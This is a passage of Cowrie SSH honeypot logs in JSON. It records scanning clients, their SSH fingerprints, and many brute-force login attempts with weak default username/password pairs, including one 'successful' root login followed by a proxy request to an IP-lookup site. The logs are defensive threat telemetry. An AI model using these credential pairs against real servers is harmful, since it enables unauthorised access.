{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:39:09.498640Z","src_ip":"212.227.235.229","session":"8d368d3e3d0f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop","message":"login attempt [hadoop/hadoop] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:10.096507Z","src_ip":"212.227.235.229","session":"8d368d3e3d0f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abc123","message":"login attempt [hadoop/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:11.225948Z","src_ip":"212.227.235.229","session":"8d368d3e3d0f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abcd123","message":"login attempt [hadoop/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:12.355578Z","src_ip":"212.227.235.229","session":"8d368d3e3d0f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abcd1234","message":"login attempt [hadoop/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:13.485661Z","src_ip":"212.227.235.229","session":"8d368d3e3d0f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"abc1234","message":"login attempt [hadoop/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:14.615800Z","src_ip":"212.227.235.229","session":"8d368d3e3d0f"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:39:15.745733Z","src_ip":"212.227.235.229","session":"8d368d3e3d0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":13381,"dst_ip":"1.2.3.4","dst_port":22,"session":"90728cc691d4","protocol":"ssh","message":"New connection: 212.227.125.160:13381 (1.2.3.4:22) [session: 90728cc691d4]","sensor":"my-vps","timestamp":"2025-08-28T00:39:21.806089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T00:39:21.807844Z","src_ip":"212.227.125.160","session":"90728cc691d4"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T00:39:21.866219Z","src_ip":"212.227.125.160","session":"90728cc691d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"dangerou","message":"login attempt [admin/dangerou] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:22.147419Z","src_ip":"212.227.125.160","session":"90728cc691d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"damion","message":"login attempt [admin/damion] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:23.209250Z","src_ip":"212.227.125.160","session":"90728cc691d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cujo","message":"login attempt [admin/cujo] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:24.271147Z","src_ip":"212.227.125.160","session":"90728cc691d4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"crave","message":"login attempt [admin/crave] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:25.333096Z","src_ip":"212.227.125.160","session":"90728cc691d4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49968,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3553206ba31","protocol":"ssh","message":"New connection: 217.72.205.35:49968 (1.2.3.4:22) [session: b3553206ba31]","sensor":"my-vps","timestamp":"2025-08-28T00:39:25.710791Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:39:25.712325Z","src_ip":"217.72.205.35","session":"b3553206ba31"}
{"eventid":"cowrie.login.failed","username":"admin","password":"crafty","message":"login attempt [admin/crafty] failed","sensor":"my-vps","timestamp":"2025-08-28T00:39:26.396011Z","src_ip":"212.227.125.160","session":"90728cc691d4"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:39:27.458270Z","src_ip":"212.227.125.160","session":"90728cc691d4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44436,"dst_ip":"1.2.3.4","dst_port":22,"session":"16c039c90bfb","protocol":"ssh","message":"New connection: 212.227.125.160:44436 (1.2.3.4:22) [session: 16c039c90bfb]","sensor":"my-vps","timestamp":"2025-08-28T00:39:59.467402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:39:59.469729Z","src_ip":"212.227.125.160","session":"16c039c90bfb"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:40:01.675478Z","src_ip":"212.227.125.160","session":"16c039c90bfb"}
{"eventid":"cowrie.login.success","username":"root","password":"@","message":"login attempt [root/@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:40:10.465743Z","src_ip":"212.227.125.160","session":"16c039c90bfb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:40:11.561496Z","session":"16c039c90bfb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:40:11.832576Z","src_ip":"212.227.125.160","session":"16c039c90bfb"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:40:12.078562Z","src_ip":"212.227.125.160","session":"16c039c90bfb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36378,"dst_ip":"1.2.3.4","dst_port":22,"session":"18f04a80215d","protocol":"ssh","message":"New connection: 212.227.125.160:36378 (1.2.3.4:22) [session: 18f04a80215d]","sensor":"my-vps","timestamp":"2025-08-28T00:40:16.275493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:40:16.278440Z","src_ip":"212.227.125.160","session":"18f04a80215d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:40:16.512893Z","src_ip":"212.227.125.160","session":"18f04a80215d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52860,"dst_ip":"1.2.3.4","dst_port":22,"session":"c007133d6a6b","protocol":"ssh","message":"New connection: 212.227.125.160:52860 (1.2.3.4:22) [session: c007133d6a6b]","sensor":"my-vps","timestamp":"2025-08-28T00:40:20.193712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:40:20.195005Z","src_ip":"212.227.125.160","session":"c007133d6a6b"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T00:40:20.255026Z","src_ip":"212.227.125.160","session":"c007133d6a6b"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T00:40:20.436558Z","src_ip":"212.227.125.160","session":"c007133d6a6b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:40:21.498687Z","src_ip":"212.227.125.160","session":"c007133d6a6b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:40:33.356596Z","src_ip":"212.227.125.160","session":"18f04a80215d"}
{"eventid":"cowrie.session.closed","duration":"18.4","message":"Connection lost after 18.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:40:34.632126Z","src_ip":"212.227.125.160","session":"18f04a80215d"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":59524,"dst_ip":"1.2.3.4","dst_port":22,"session":"3748ea0af9af","protocol":"ssh","message":"New connection: 171.243.151.203:59524 (1.2.3.4:22) [session: 3748ea0af9af]","sensor":"my-vps","timestamp":"2025-08-28T00:40:55.712197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:40:55.717439Z","src_ip":"171.243.151.203","session":"3748ea0af9af"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":54960,"dst_ip":"1.2.3.4","dst_port":22,"session":"93fe281ed57e","protocol":"ssh","message":"New connection: 194.233.79.134:54960 (1.2.3.4:22) [session: 93fe281ed57e]","sensor":"my-vps","timestamp":"2025-08-28T00:40:55.759861Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:40:55.971974Z","src_ip":"171.243.151.203","session":"3748ea0af9af"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:40:56.089585Z","src_ip":"194.233.79.134","session":"93fe281ed57e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:40:56.113469Z","src_ip":"194.233.79.134","session":"93fe281ed57e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:40:57.982583Z","src_ip":"171.243.151.203","session":"3748ea0af9af"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:40:59.535340Z","src_ip":"171.243.151.203","session":"3748ea0af9af"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T00:40:59.933035Z","src_ip":"194.233.79.134","session":"93fe281ed57e"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:41:01.138933Z","src_ip":"194.233.79.134","session":"93fe281ed57e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50598,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7c7ce7c2655","protocol":"ssh","message":"New connection: 212.227.235.229:50598 (1.2.3.4:22) [session: e7c7ce7c2655]","sensor":"my-vps","timestamp":"2025-08-28T00:41:17.141685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:41:17.142734Z","src_ip":"212.227.235.229","session":"e7c7ce7c2655"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.c